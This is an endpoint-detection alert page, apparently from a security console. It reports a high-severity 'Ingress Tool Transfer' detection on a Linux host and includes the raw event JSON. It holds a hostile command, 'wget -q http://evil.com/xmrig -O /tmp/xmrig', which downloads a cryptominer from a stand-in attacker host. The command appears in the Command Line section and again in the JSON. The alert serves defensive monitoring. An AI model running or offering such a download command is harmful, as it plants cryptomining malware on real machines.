Alert Details - DeFender X

Alert Information High

Alert ID: ind:af4714f04ea341d8b9ee63c7ec7ad5c9:1766236055308012691-30126-4567312
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:af4714f04ea341d8b9ee63c7ec7ad5c9:1766236055308012691-30126-4567312
설명: An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.
호스트: in-bridge-40
상태: new
생성 시간: 2025-12-20 22:08:37
업데이트 시간: 2025-12-20 23:07:37

MITRE ATT&CK

Tactic: Command and Control
Technique: Ingress Tool Transfer

Command Line

wget -q http://evil.com/xmrig -O /tmp/xmrig

Raw JSON Data

{"id":"ind:af4714f04ea341d8b9ee63c7ec7ad5c9:1766236055308012691-30126-4567312","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:af4714f04ea341d8b9ee63c7ec7ad5c9:1766236055308012691-30126-4567312","agent_id":"af4714f04ea341d8b9ee63c7ec7ad5c9","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Ingress Tool Transfer","technique_id":"T1105","cmdline":"wget -q http://evil.com/xmrig -O /tmp/xmrig","filename":"wget","filepath":"/usr/bin/wget","sha256":"8ecc3441976471cda73d3f645976dbeeed1f9a493f603fe89d5ac9909b6bd08b","status":"new","type":"ldt","created_timestamp":"2025-12-20T13:08:37.331433532Z","updated_timestamp":"2025-12-20T14:07:37.400728533Z","device":{"device_id":"af4714f04ea341d8b9ee63c7ec7ad5c9","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"in-bridge-40","local_ip":"172.30.1.19","external_ip":"14.47.49.244","mac_address":"00-0c-29-c8-eb-b6","platform_name":"Linux","os_version":"Ubuntu 22.04"},"aggregate_id":"aggind:af4714f04ea341d8b9ee63c7ec7ad5c9:12944303653","CreatedAt":"2025-12-20T22:08:37.3314335+09:00","UpdatedAt":"2025-12-20T23:07:37.4007285+09:00"}

Quick Info

Severity High
Score 70
Agent ID af4714f04ea341d8b9ee63c7ec7ad5c9

Actions

Falcon Console에서 보기 목록으로 돌아가기